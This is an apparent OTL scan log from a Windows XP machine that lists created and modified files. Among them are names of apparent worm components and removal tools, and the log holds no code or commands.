[2012/05/10 13:15:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\ZAR
[2012/05/01 23:56:55 | 000,000,000 | ---D | C] -- C:\Program Files\FK_Monitor
[2012/05/01 23:56:14 | 000,463,080 | ---- | C] (CNET Download.com) -- C:\Documents and Settings\Annie\Desktop\cnet2_fkeylogger_zip.exe
[2012/04/25 00:05:15 | 002,568,952 | ---- | C] (Piriform Ltd) -- C:\Documents and Settings\Annie\Desktop\rcsetup142.exe
[2012/04/25 00:01:22 | 000,000,000 | ---D | C] -- C:\Program Files\ZAR
[2012/04/24 23:42:26 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\My Documents\CardRecovery
[2012/04/24 23:40:43 | 000,841,568 | ---- | C] (WinRecovery Software ) -- C:\Documents and Settings\Annie\Desktop\cardrecovery_setup.exe
[2012/04/08 16:35:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\My Documents\Convo History
[2012/03/22 11:14:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Start Menu\Programs\Google Chrome
[2012/03/22 11:13:02 | 000,733,304 | ---- | C] (Google Inc.) -- C:\Documents and Settings\Annie\Desktop\ChromeSetup.exe
[2012/03/17 14:32:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\webex
[2012/03/01 01:22:44 | 000,017,280 | ---- | C] (Systweak Inc., (www.systweak.com)) -- C:\WINDOWS\System32\roboot.exe
[2012/03/01 01:22:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\systweak
[2012/03/01 01:21:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon
[2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Babylon
[2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Babylon
[2012/03/01 01:21:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\ViStart
[2012/03/01 01:21:16 | 000,000,000 | ---D | C] -- C:\Program Files\ViStart
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

========== Files - Modified Within 90 Days ==========

[2012/05/13 11:51:03 | 000,000,998 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/05/13 11:51:00 | 000,000,976 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/13 11:23:01 | 000,000,978 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Israfel.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\hta.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\GEDZAC.vbs
[2012/05/13 11:17:53 | 000,123,897 | ---- | M] () -- C:\WINDOWS\System32\FILEZIP.ZIP
[2012/05/13 11:17:51 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\File.vbs
[2012/05/13 11:17:14 | 000,272,349 | ---- | M] () -- C:\WINDOWS\DelShortcut.vbs
[2012/05/13 11:16:15 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/13 11:16:15 | 000,002,913 | ---- | M] () -- C:\WINDOWS\wininit.ini
[2012/05/13 11:10:31 | 000,000,610 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\UnHookExec.inf
[2012/05/13 11:06:03 | 000,443,676 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2012/05/13 11:06:03 | 000,072,584 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2012/05/13 11:03:52 | 020,265,686 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A.zip
[2012/05/13 11:03:48 | 006,058,459 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A.zip
[2012/05/13 11:03:47 | 004,919,617 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Lan_Atheros_1.0.0.17_XPx86_A.zip
[2012/05/13 11:03:45 | 002,854,421 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Critical Thinking.zip
[2012/05/13 11:03:43 | 015,491,072 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\BLUETO~1.!!!
[2012/05/13 11:02:05 | 000,002,333 | ---- | M] () -- C:\WINDOWS\System32\ixn.dat
[2012/05/13 11:02:05 | 000,001,201 | ---- | M] () -- C:\WINDOWS\System32\ix.dat
[2012/05/13 11:01:30 | 000,272,588 | ---- | M] () -- C:\WINDOWS\System32\Template.htm
[2012/05/13 11:01:30 | 000,002,268 | ---- | M] () -- C:\WINDOWS\System32\iwn.dat
[2012/05/13 11:01:30 | 000,001,372 | ---- | M] () -- C:\WINDOWS\System32\iw.dat
[2012/05/13 11:01:18 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2012/05/13 11:01:16 | 1063,317,504 | -HS- | M] () -- C:\hiberfil.sys
[2012/05/12 22:43:53 | 000,133,632 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/05/12 21:29:31 | 000,001,686 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Samsung AllShare.lnk
[2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
[2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
[2012/05/12 19:43:25 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2012/05/12 14:23:01 | 000,000,926 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/12 13:42:10 | 000,000,327 | RHS- | M] () -- C:\boot.ini
[2012/05/12 13:39:45 | 000,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2012/05/12 13:28:10 | 004,490,121 | R--- | M] (Swearware) -- C:\Documents and Settings\Annie\Desktop\ComboFix.exe
[2012/05/11 11:22:21 | 000,012,549 | ---- | M] () -- C:\WINDOWS\System32\AvrilLavigne.jpg
[2012/05/10 18:41:00 | 107,486,025 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Bluetooth_Broadcom_5.5.0.7400_XPx86_A.zip
[2012/05/09 14:51:21 | 000,367,500 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\am_application.pdf
[2012/05/05 11:49:43 | 001,843,254 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\New Bitmap Image.bmp
[2012/05/02 20:28:02 | 000,002,286 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Google Chrome.lnk
[2012/05/02 20:28:02 | 000,002,264 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2012/05/01 23:56:14 | 000,463,080 | ---- | M] (CNET Download.com) -- C:\Documents and Settings\Annie\Desktop\cnet2_fkeylogger_zip.exe
[2012/04/28 09:42:23 | 002,393,032 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\B9E1Ad01.pdf
[2012/04/25 00:05:33 | 002,568,952 | ---- | M] (Piriform Ltd) -- C:\Documents and Settings\Annie\Desktop\rcsetup142.exe
[2012/04/25 00:00:37 | 003,917,522 | ---- | M] ( ) -- C:\Documents and Settings\Annie\Desktop\zar91setup.exe
[2012/04/24 23:40:43 | 000,841,568 | ---- | M] (WinRecovery Software ) -- C:\Documents and Settings\Annie\Desktop\cardrecovery_setup.exe
[2012/04/14 15:30:12 | 000,059,392 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot
[2012/04/01 21:48:17 | 000,405,016 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\135bir__97234_zoom.png
[2012/03/22 15:52:58 | 000,255,330 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Carek 2009.pdf
[2012/03/22 11:13:02 | 000,733,304 | ---- | M] (Google Inc.) -- C:\Documents and Settings\Annie\Desktop\ChromeSetup.exe
[2012/03/20 21:59:55 | 000,043,322 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\tax 2011 Anaam uni.PDF
[2012/03/17 14:27:47 | 016,713,216 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\atmcns.msi
[2012/03/04 12:51:34 | 000,369,139 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\fernbrook.PDF
[2012/03/01 10:42:56 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Kernel32.win
[2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
[2012/03/01 01:21:08 | 000,602,256 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\windows-start-menu-vistart.exe
[2012/02/25 23:21:25 | 000,001,010 | ---- | M] () -- C:\Documents and Settings\Annie\Start Menu\Programs\Startup\Dropbox.lnk
[2012/02/25 23:21:25 | 000,001,010 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\Dropbox.lnk
[2012/02/18 01:07:43 | 000,046,507 | ---- | M] () -- C:\Documents and Settings\Annie\Desktop\phd121411s.gif
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

========== Files Created - No Company Name ==========

[2012/05/13 11:16:15 | 000,063,488 | ---- | C] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/13 11:08:15 | 000,000,610 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\UnHookExec.inf
[2012/05/12 21:29:31 | 000,001,686 | ---- | C] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Samsung AllShare.lnk
[2012/05/12 13:42:10 | 000,000,211 | ---- | C] () -- C:\Boot.bak
[2012/05/12 13:42:06 | 000,260,272 | RHS- | C] () -- C:\cmldr
[2012/05/12 13:41:24 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2012/05/12 13:41:24 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2012/05/12 13:41:24 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2012/05/12 13:41:24 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2012/05/12 13:41:24 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2012/05/12 11:08:54 | 1063,317,504 | -HS- | C] () -- C:\hiberfil.sys
[2012/05/11 11:23:53 | 015,491,072 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\BLUETO~1.!!!
[2012/05/11 11:22:23 | 000,272,349 | ---- | C] () -- C:\WINDOWS\System32\Kernel32.win
[2012/05/10 18:37:16 | 020,265,686 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A.zip
[2012/05/10 18:36:59 | 006,058,459 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A.zip
[2012/05/10 18:36:48 | 004,919,617 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Lan_Atheros_1.0.0.17_XPx86_A.zip
[2012/05/10 18:36:32 | 107,486,025 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Bluetooth_Broadcom_5.5.0.7400_XPx86_A.zip
[2012/05/09 14:51:21 | 000,367,500 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\am_application.pdf
[2012/05/05 11:49:06 | 001,843,254 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\New Bitmap Image.bmp
[2012/04/28 09:42:31 | 002,393,032 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\B9E1Ad01.pdf
[2012/04/25 00:00:33 | 003,917,522 | ---- | C] ( ) -- C:\Documents and Settings\Annie\Desktop\zar91setup.exe
[2012/04/14 15:32:39 | 000,059,392 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot
[2012/04/01 21:48:16 | 000,405,016 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\135bir__97234_zoom.png
[2012/03/22 15:52:58 | 000,255,330 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Carek 2009.pdf
[2012/03/22 11:14:32 | 000,002,286 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Google Chrome.lnk
[2012/03/22 11:14:32 | 000,002,264 | ---- | C] () -- C:\Documents and Settings\Annie\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2012/03/22 11:13:11 | 000,000,978 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
[2012/03/22 11:13:11 | 000,000,926 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/03/20 22:00:14 | 000,043,322 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\tax 2011 Anaam uni.PDF
[2012/03/17 14:27:20 | 016,713,216 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\atmcns.msi
[2012/03/08 19:01:04 | 000,066,285 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf
[2012/03/04 12:52:04 | 000,369,139 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\fernbrook.PDF
[2012/03/01 01:22:07 | 000,000,237 | ---- | C] () -- C:\user.js
[2012/03/01 01:21:01 | 000,602,256 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\windows-start-menu-vistart.exe
[2012/02/18 01:07:42 | 000,046,507 | ---- | C] () -- C:\Documents and Settings\Annie\Desktop\phd121411s.gif
[2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/12/06 02:38:16 | 000,002,333 | ---- | C] () -- C:\WINDOWS\System32\ixn.dat
[2011/12/06 02:38:16 | 000,001,201 | ---- | C] () -- C:\WINDOWS\System32\ix.dat
[2011/12/06 02:38:02 | 000,002,268 | ---- | C] () -- C:\WINDOWS\System32\iwn.dat
[2011/12/06 02:38:02 | 000,001,372 | ---- | C] () -- C:\WINDOWS\System32\iw.dat
[2011/12/05 13:26:23 | 000,002,913 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2011/12/05 13:26:19 | 000,042,167 | ---- | C] () -- C:\WINDOWS\System32\pkzip.exe
[2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
[2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
[2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
[2011/07/24 23:20:17 | 000,023,624 | ---- | C] () -- C:\WINDOWS\System32\drivers\hitmanpro35.sys
[2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
[2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
[2011/06/13 16:12:48 | 000,339,880 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2011/05/06 01:03:25 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2011/05/06 00:59:38 | 000,133,632 | ---- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/05/04 00:00:00 | 001,759,744 | ---- | C] () -- C:\WINDOWS\System32\drivers\snp2uvc.sys
[2011/05/04 00:00:00 | 000,196,608 | ---- | C] ( ) -- C:\WINDOWS\System32\csnp2uvc.dll
[2011/05/04 00:00:00 | 000,028,544 | ---- | C] () -- C:\WINDOWS\System32\drivers\sncduvc.sys
[2011/05/04 00:00:00 | 000,000,323 | ---- | C] () -- C:\WINDOWS\PidList.ini
[2011/05/03 23:59:57 | 000,225,280 | ---- | C] ( ) -- C:\WINDOWS\System32\rsnp2uvc.dll

========== LOP Check ==========

[2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Babylon
[2012/05/10 20:15:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Broadcom
[2011/07/09 10:08:29 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2012/01/25 16:32:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2011/12/11 01:39:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Hitman Pro
[2011/05/06 00:11:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WildTangent
[2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Babylon
[2012/01/25 17:22:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DAEMON Tools Lite
[2011/05/22 20:59:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DataCast
[2011/05/08 17:18:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\DDMSettings
[2012/05/13 11:01:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Dropbox
[2012/05/10 13:15:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\FK_Monitor
[2011/05/20 21:08:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Foxit Software
[2011/05/06 00:46:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\MSNInstaller
[2011/05/18 19:46:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\OpenOffice.org
[2012/05/11 09:16:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\QuickScan
[2012/05/12 21:29:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Samsung
[2012/03/01 01:24:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\systweak
[2012/05/10 13:15:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\uTorrent
[2012/03/01 01:21:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\ViStart
[2012/03/17 14:32:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\webex
[2011/05/06 18:18:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Application Data\Foxit Software
[2012/05/12 21:30:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Application Data\Samsung
[2012/05/13 11:51:00 | 000,000,976 | ---- | M] () -- C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
[2012/05/13 11:51:03 | 000,000,998 | ---- | M] () -- C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job

========== Purity Check ==========



========== Custom Scans ==========

< "%WinDir%\$NtUninstallKB*$." /30 >

< C:\Program Files\Common Files\ComObjects\*.* /s >

< %SYSTEMDRIVE%\*.* >
[2012/01/26 15:04:11 | 000,000,000 | ---- | M] () -- C:\AILog.txt
[2009/08/03 13:28:56 | 000,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT
[2011/05/29 09:48:58 | 000,000,211 | ---- | M] () -- C:\Boot.bak
[2012/05/12 13:42:10 | 000,000,327 | RHS- | M] () -- C:\boot.ini
[2004/08/03 23:00:00 | 000,260,272 | RHS- | M] () -- C:\cmldr
[2012/05/12 19:47:07 | 000,281,162 | ---- | M] () -- C:\ComboFix.txt
[2009/08/03 13:28:56 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
[2012/05/13 11:01:16 | 1063,317,504 | -HS- | M] () -- C:\hiberfil.sys
[2011/11/07 13:56:26 | 006,480,192 | ---- | M] (SurfRight B.V.) -- C:\HitmanPro35.exe
[2009/08/03 13:28:56 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2012/01/17 18:28:42 | 000,003,410 | ---- | M] () -- C:\lists.txt
[2011/07/24 23:05:27 | 009,466,208 | ---- | M] (Malwarebytes Corporation ) -- C:\mbam-setup-1.51.1.1800.exe
[2009/07/27 04:09:36 | 000,002,040 | ---- | M] () -- C:\MOD01SET0J00P2000Z.enc
[2009/03/12 02:49:57 | 000,002,508 | ---- | M] () -- C:\MOD01WOS02E1P20001.enc
[2009/08/03 13:28:56 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2008/04/14 08:00:00 | 000,047,564 | RHS- | M] () -- C:\NTDETECT.COM
[2008/04/14 08:00:00 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2012/05/13 11:01:15 | 1598,029,824 | -HS- | M] () -- C:\pagefile.sys
[2009/08/03 15:18:45 | 000,001,885 | ---- | M] () -- C:\RHDSetup.log
[2011/07/24 23:09:17 | 016,409,960 | ---- | M] (Safer Networking Limited ) -- C:\spybotsd162.exe
[2012/05/13 12:01:10 | 000,084,470 | ---- | M] () -- C:\TDSSKiller.2.7.34.0_13.05.2012_11.48.02_log.txt
[2011/07/24 23:07:04 | 001,383,430 | ---- | M] () -- C:\tdsskiller.zip
[2011/05/04 01:05:03 | 000,000,054 | ---- | M] () -- C:\TEST.ini
[2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
[2011/05/04 00:00:22 | 000,000,167 | ---- | M] () -- C:\Webcam.log

< %USERPROFILE%\*.* >
[2011/12/06 02:45:19 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ABCNBDAD
[2012/05/13 11:16:15 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/12 23:25:36 | 007,077,888 | ---- | M] () -- C:\Documents and Settings\Annie\ntuser.dat
[2012/05/13 12:18:23 | 000,001,024 | -H-- | M] () -- C:\Documents and Settings\Annie\ntuser.dat.LOG
[2012/05/12 23:25:36 | 000,000,178 | -HS- | M] () -- C:\Documents and Settings\Annie\ntuser.ini
[2012/05/05 11:43:13 | 000,006,227 | ---- | M] () -- C:\Documents and Settings\Annie\reset.log

< %USERPROFILE%\Application Data\*.* >
[2009/08/03 09:23:53 | 000,000,062 | -HS- | M] () -- C:\Documents and Settings\Annie\Application Data\desktop.ini

< %USERPROFILE%\Local Settings\Application Data\*.* >
[2011/07/24 22:48:01 | 000,002,976 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
[2012/01/08 06:26:29 | 000,004,068 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/07/30 17:56:23 | 000,002,506 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2012/05/12 22:43:53 | 000,133,632 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/01/26 11:48:18 | 000,098,088 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2012/05/12 23:25:28 | 005,850,994 | -H-- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\IconCache.db
[2011/07/29 22:30:56 | 000,001,476 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
[2011/07/31 13:54:05 | 000,001,424 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x

< %AllUsersProfile%\*.* >
[2011/05/03 23:57:30 | 000,262,144 | ---- | M] () -- C:\Documents and Settings\All Users\NTUSER.DAT
[2012/05/12 19:23:24 | 000,001,024 | -H-- | M] () -- C:\Documents and Settings\All Users\NTUSER.DAT.LOG

< %AllUsersProfile%\Application Data\*.* >
[2011/07/24 22:48:01 | 000,002,976 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
[2012/01/08 06:26:29 | 000,004,068 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/07/30 17:56:23 | 000,002,506 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
[2009/08/03 09:23:53 | 000,000,062 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\desktop.ini
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
[2011/07/29 22:30:56 | 000,001,476 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
[2011/07/31 13:54:05 | 000,001,424 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe

< %USERPROFILE%\My Documents\*.* >
[2011/06/21 13:53:02 | 000,343,735 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\13-cis Retinoic Acid Induces Apoptosis and Cell Cycle Arrest in Human SEB-1 Sebocytes.PDF
[2011/06/21 13:35:57 | 000,551,357 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\accutane1.PDF
[2011/06/21 13:40:22 | 001,481,725 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Accutane2.PDF
[2011/06/21 13:48:45 | 000,411,913 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Accutane3.PDF
[2011/04/03 03:14:26 | 000,050,689 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\astro_w2gw_01_annie_hp.15215.18556.gif
[2011/04/03 03:15:58 | 000,056,807 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\astro_w2gw_01_annie_hp.15347.20005.pdf
[2011/05/03 23:59:03 | 000,000,076 | -HS- | M] () -- C:\Documents and Settings\Annie\My Documents\desktop.ini
